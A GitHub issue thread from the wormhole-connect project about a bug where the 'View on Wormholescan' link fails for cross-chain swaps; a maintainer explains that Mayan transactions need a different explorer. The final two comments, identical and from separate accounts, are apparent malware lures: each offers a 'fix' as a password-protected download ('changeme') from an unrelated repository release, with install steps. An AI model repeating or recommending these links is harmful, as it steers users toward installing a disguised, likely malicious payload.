### ISSUE TITLE
[QA] Transaction is not found on Wormholescan

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2458]
## Describe the current behavior in detail
Checked on https://wormhole-connect-mainnet.netlify.app/ with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Swap 1 USDT from Solana (Phantom) to USDC on Optimism (MetaMask)
2. Click on "View on Wormholescan" link

Actual result: Error "Search not found" is displayed. 
Expected result: Transaction is successfully found. 

## Notes/ Attachments
* Link to [Wormholescan](https://wormholescan.io/#/tx/57KJPi4KnvDNRnkr9vGrmXLhyLgWmA1mN2h9QahG2A1hbPfgVsi61MmsKzEp7bj3mS79YZP8VQKCGLHXJKKhJ4n7)
* Send from tx: [Solana Explorer](https://solscan.io/tx/57KJPi4KnvDNRnkr9vGrmXLhyLgWmA1mN2h9QahG2A1hbPfgVsi61MmsKzEp7bj3mS79YZP8VQKCGLHXJKKhJ4n7)
* Send to tx: [Optimistic Etherscan](https://optimistic.etherscan.io/tx/0x36078f57dba04307ade2566470bfb462c7b3e3806b4cb93ab04d7ea3ea4cfbd6)

https://github.com/user-attachments/assets/1e42bf86-5520-4668-ac2f-ba973887a1ad

**Comment by agodlevska** [comment]
Issue reproducible on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) (connect v2) when swapping 0.00055 ETH from Arbitrum (MetaMask) to AVAX on Avalanche (MetaMask). 

[Wormholescan](https://wormholescan.io/#/tx/0x72f4ccc1f97abfc6c0834f21be07b866275347f50e203d4736245f7656f3062a) link - "Search not found" error is displayed.

**Comment by artursapek** [comment]
yeah, wormholescan doesnt support mayan. I need to change the explorer link for mayan txs so it goes to https://explorer.mayan.finance/. will do so

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
